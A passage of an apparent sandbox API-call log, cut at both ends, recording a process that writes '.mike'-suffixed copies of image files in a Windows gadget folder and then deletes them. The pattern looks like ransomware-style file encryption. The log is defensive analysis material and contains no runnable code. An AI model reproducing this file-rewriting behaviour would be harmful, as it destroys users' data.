lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike", lpFilePart=0x0) returned 0x58 [0102.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.633] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x218cffc | out: lpFileInformation=0x218cffc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6766e00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6766e00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6766e00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb00)) returned 1 [0102.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.633] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.633] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", dwFileAttributes=0x80) returned 0 [0102.634] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.634] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6766e00, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x6766e00, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x6766e00, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb00)) returned 1 [0102.634] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.634] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png", lpFilePart=0x0) returned 0x53 [0102.634] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double.png.mike")) returned 1 [0102.636] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.636] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.636] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.636] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0102.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.637] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.637] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.638] GetFileType (hFile=0x288) returned 0x1 [0102.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.638] GetFileType (hFile=0x288) returned 0x1 [0102.638] CloseHandle (hObject=0x288) returned 1 [0102.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.638] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0102.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.638] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), fInfoLevelId=0x0, lpFileInformation=0x218f950 | out: lpFileInformation=0x218f950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824aa72c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824aa72c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbc1)) returned 1 [0102.638] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.638] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.638] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.638] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), fInfoLevelId=0x0, lpFileInformation=0x218fcc0 | out: lpFileInformation=0x218fcc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824aa72c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824aa72c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbc1)) returned 1 [0102.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.639] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0102.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", lpFilePart=0x0) returned 0x57 [0102.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x5c [0102.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.639] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0102.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.639] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x5c [0102.640] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.640] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0102.640] GetFileType (hFile=0x288) returned 0x1 [0102.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.640] GetFileType (hFile=0x288) returned 0x1 [0102.640] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0102.640] WriteFile (in: hFile=0x288, lpBuffer=0x2190d64*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2190d64*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.641] CloseHandle (hObject=0x288) returned 1 [0102.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.641] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png"), fInfoLevelId=0x0, lpFileInformation=0x21907d8 | out: lpFileInformation=0x21907d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x824aa72c, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x824aa72c, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28266257, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xbc1)) returned 1 [0102.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.642] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.644] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike", lpFilePart=0x0) returned 0x5c [0102.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.644] WriteFile (in: hFile=0x288, lpBuffer=0x2199470*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2199470*, lpNumberOfBytesWritten=0x2af074*=0xbd0, lpOverlapped=0x0) returned 1 [0102.644] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.644] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.645] WriteFile (in: hFile=0x288, lpBuffer=0x219c6d4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x219c6d4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.646] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.646] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png", dwFileAttributes=0x80) returned 0 [0102.648] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.648] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.648] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_bkg.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_bkg.png.mike")) returned 1 [0102.649] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.651] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.651] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.651] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.653] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", lpFilePart=0x0) returned 0x5a [0102.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.653] WriteFile (in: hFile=0x288, lpBuffer=0x21a1db4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21a1db4*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.657] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike", lpFilePart=0x0) returned 0x5f [0102.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.657] WriteFile (in: hFile=0x288, lpBuffer=0x21ab138*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21ab138*, lpNumberOfBytesWritten=0x2af074*=0xde0, lpOverlapped=0x0) returned 1 [0102.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.660] WriteFile (in: hFile=0x288, lpBuffer=0x21ae3a4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21ae3a4*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.661] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png", dwFileAttributes=0x80) returned 0 [0102.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.663] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_double_orange.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\calendar_double_orange.png.mike")) returned 1 [0102.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0102.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0102.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0102.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0102.666] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.666] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.667] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", lpFilePart=0x0) returned 0x58 [0102.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0102.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0102.667] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.667] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.668] WriteFile (in: hFile=0x288, lpBuffer=0x21b3a78*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21b3a78*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0102.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0102.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0102.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0102.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0102.671] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png.mike", lpFilePart=0x0) returned 0x5d [0102.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0102.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0102.672] WriteFile (in: hFile=0x288, lpBuffer=0x21bc1ec*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21bc1ec*, lpNumberOfBytesWritten=0x2af074*=0xbe0, lpOverlapped=0x0) returned 1 [0102.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0102.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0102.673] WriteFile (in: hFile=0x288, lpBuffer=0x21bf450*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x21bf450*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0102.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0102.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0102.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0102.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0102.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\calendar_ring_docked.png", dwFileAttributes=0x80) returned 0 [0102.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0102.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0102.676] DeleteFileW (lpFileName="C:\\Program Files\\Windows 